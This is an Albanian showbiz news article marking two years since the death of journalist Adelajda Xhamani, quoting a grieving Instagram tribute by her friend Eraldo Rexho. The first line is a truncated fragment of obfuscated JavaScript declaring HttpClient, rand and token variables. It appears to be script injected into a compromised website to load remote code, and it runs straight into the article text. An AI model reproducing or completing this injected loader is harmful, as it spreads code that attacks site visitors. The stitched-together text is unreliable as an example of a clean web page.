;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Dy vite pa Adelën: Miku i saj i ngushtë përlotë me dedikimin prekës

By

Dy vite më parë, opinioni publik në Shqipëri e Kosovë u trondit nga lajmi i beftë i ndarjes së parakohshme nga jeta të Adelajda Xhamanit, gazetares së njohur e cila famën e mori si banore e ‘Big Brother Albania 2’.

Shkak i ndarjes nga jeta kishte qenë një sulm kardiak në orët e vona të mbrëmjes në banesën ku Adela, siç e njihnin të gjithë, jetonte vetëm.

Përkundër se kishte arritur të thërriste një nga miqtë e saj dhe ambulanca mbërriti pa vonuar, Adela nuk ia doli t’i mbijetojë sulmit, që nga raporti i autopsisë dyshohej të ishte shkaktuar nga probleme të mëhershme për të cilat 31-vjeçarja nuk ishte në dijeni.

Me të zbardhur dita e 29 Tetorit, ka qenë një prej miqve të saj më të ngushtë, Eraldo Rexho ai që e ka kujtuar shoqen dhe bashkëpunëtoren e tij me fjalët më të ndjera.

Rexho, i cili drejton edhe sot median online në të cilën punoi Adela mes tjerash në postimin e bërë me një video teksa këndonte me Xhamanin shprehet: ‘Vitet nuk e zbehin dhimbjen… Na paskan gënjyer Adela, koha nuk shëroka çdo plagë! Ikja jote dhemb njësoj, edhe sot, si çdo ditë. Gjithçka na ka mbetur tani janë kujtimet. Të gjejmë në memorien e ‘Facebook’ dhe ‘Instagram’, në galerinë e fotove në i-phone, në videot e shkarkuar në kompjuter, në një kërkim në ‘Youtube’, në një rikthim tek bisedat e ‘Whatsapp’… Në zyrën 40 metra katrorë, rrethuar nga orenditë që i zgjodhëm bashkë, në kolltukun ku bënim muhabetet e ditës, në tavolinën ku thurnim plane. Ti je gjithandej! Je te 21-shi, tek rruga e Kavajës, tek Blloku, në Shkozë, Kombinat e Kinostudio, je tek eventi i fundit, ku ishim dje. Jeta vazhdon, por s’është njësoj pa ty.’

‘Kam rreth vetes, plot miq e bashkëpunëtorë të tjerë, të rinj e të vjetër, por nuk po e gjej Adelën. Adelën që këndonte çdo ditë me mua, e që do të jetë gjithnjë në zemrën time. Të duam shumë dhe na mungon pafund’ – përfundon shkrimi i ndjerë i gazetarit të shoubizit. /Prive.al

View this post on Instagram

Vitet nuk e zbehin dhimbjen… Na paskan gënjyer Adela, koha nuk shëroka çdo plagë! Ikja jote dhemb njësoj, edhe sot, si çdo ditë. Gjithçka na ka mbetur tani janë kujtimet. Të gjejmë në memorien e 'Facebook' dhe 'Instagram', në galerinë e fotove në i-phone, në videot e shkarkuar në kompjuter, në një kërkim në 'Youtube', në një rikthim tek bisedat e 'Whatsapp'… Në zyrën 40 metra katrorë, rrethuar nga orenditë që i zgjodhëm bashkë, në kolltukun ku bënim muhabetet e ditës, në tavolinën ku thurnim plane. Ti je gjithandej! Je te 21-shi, tek rruga e Kavajës, tek Blloku, në Shkozë, Kombinat e Kinostudio, je tek eventi i fundit, ku ishim dje. Jeta vazhdon, por s’është njësoj pa ty. Sepse na paskan gënjyer edhe kur na kanë thënë që nuk ka njerëz të pazëvendësueshëm. E di që në rastet e humbjeve të përhershme nuk ka vend për këtë krahasim, por unë ende po kërkoj për një bashkëpunëtore si ty. Kam rreth vetes, plot miq e bashkëpunëtorë të tjerë, të rinj e të vjetër, por nuk po e gjej Adelën. Adelën që këndonte çdo ditë me mua, e që do të jetë gjithnjë në zemrën time. Të duam shumë dhe na mungon pafund 💔 #KurrëNukTëHarroj #PërgjithmonëAdela #2VjetPaTy

A post shared by Eraldo Rexho (@eraldorexho) on

 

Artikuj të ngjashëm